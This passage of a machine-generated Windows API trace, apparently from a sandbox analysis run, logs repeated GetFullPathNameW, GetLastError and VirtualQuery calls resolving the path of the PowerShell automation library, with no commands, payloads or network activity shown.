lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.330] GetLastError () returned 0x0 [0141.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.330] GetLastError () returned 0x0 [0141.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.330] GetLastError () returned 0x0 [0141.330] VirtualQuery (in: lpAddress=0x25cc04, lpBuffer=0x25dc04, dwLength=0x1c | out: lpBuffer=0x25dc04*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.330] VirtualQuery (in: lpAddress=0x25cc40, lpBuffer=0x25dc40, dwLength=0x1c | out: lpBuffer=0x25dc40*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.330] GetLastError () returned 0x0 [0141.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.331] GetLastError () returned 0x0 [0141.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.331] GetLastError () returned 0x0 [0141.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.331] GetLastError () returned 0x0 [0141.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.331] GetLastError () returned 0x0 [0141.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.331] GetLastError () returned 0x0 [0141.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.331] GetLastError () returned 0x0 [0141.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.331] GetLastError () returned 0x0 [0141.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.331] GetLastError () returned 0x0 [0141.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.331] GetLastError () returned 0x0 [0141.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.331] GetLastError () returned 0x0 [0141.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.332] GetLastError () returned 0x0 [0141.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.332] GetLastError () returned 0x0 [0141.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.332] GetLastError () returned 0x0 [0141.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.332] GetLastError () returned 0x0 [0141.332] VirtualQuery (in: lpAddress=0x25d074, lpBuffer=0x25e074, dwLength=0x1c | out: lpBuffer=0x25e074*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.332] GetLastError () returned 0x0 [0141.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.332] GetLastError () returned 0x0 [0141.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.332] GetLastError () returned 0x0 [0141.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.332] GetLastError () returned 0x0 [0141.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.332] GetLastError () returned 0x0 [0141.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.332] GetLastError () returned 0x0 [0141.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.333] GetLastError () returned 0x0 [0141.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.333] GetLastError () returned 0x0 [0141.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.333] GetLastError () returned 0x0 [0141.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.333] GetLastError () returned 0x0 [0141.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.333] GetLastError () returned 0x0 [0141.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.333] GetLastError () returned 0x0 [0141.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.333] GetLastError () returned 0x0 [0141.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.333] GetLastError () returned 0x0 [0141.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.333] GetLastError () returned 0x0 [0141.334] VirtualQuery (in: lpAddress=0x25d074, lpBuffer=0x25e074, dwLength=0x1c | out: lpBuffer=0x25e074*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.334] GetLastError () returned 0x0 [0141.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.334] GetLastError () returned 0x0 [0141.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.334] GetLastError () returned 0x0 [0141.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.334] GetLastError () returned 0x0 [0141.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.334] GetLastError () returned 0x0 [0141.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.334] GetLastError () returned 0x0 [0141.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.334] GetLastError () returned 0x0 [0141.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.334] GetLastError () returned 0x0 [0141.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.334] GetLastError () returned 0x0 [0141.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.334] GetLastError () returned 0x0 [0141.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.335] GetLastError () returned 0x0 [0141.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.335] GetLastError () returned 0x0 [0141.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.335] GetLastError () returned 0x0 [0141.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.335] GetLastError () returned 0x0 [0141.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.335] GetLastError () returned 0x0 [0141.335] VirtualQuery (in: lpAddress=0x25d074, lpBuffer=0x25e074, dwLength=0x1c | out: lpBuffer=0x25e074*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.335] GetLastError () returned 0x0 [0141.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.335] GetLastError () returned 0x0 [0141.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.335] GetLastError () returned 0x0 [0141.335] VirtualQuery (in: lpAddress=0x25d074, lpBuffer=0x25e074, dwLength=0x1c | out: lpBuffer=0x25e074*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.336] GetLastError () returned 0x0 [0141.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.336] GetLastError () returned 0x0 [0141.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.336] GetLastError () returned 0x0 [0141.336] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.336] VirtualQuery (in: lpAddress=0x25cce0, lpBuffer=0x25dce0, dwLength=0x1c | out: lpBuffer=0x25dce0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.336] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.336] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.337] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.337] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.337] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.337] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.337] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, 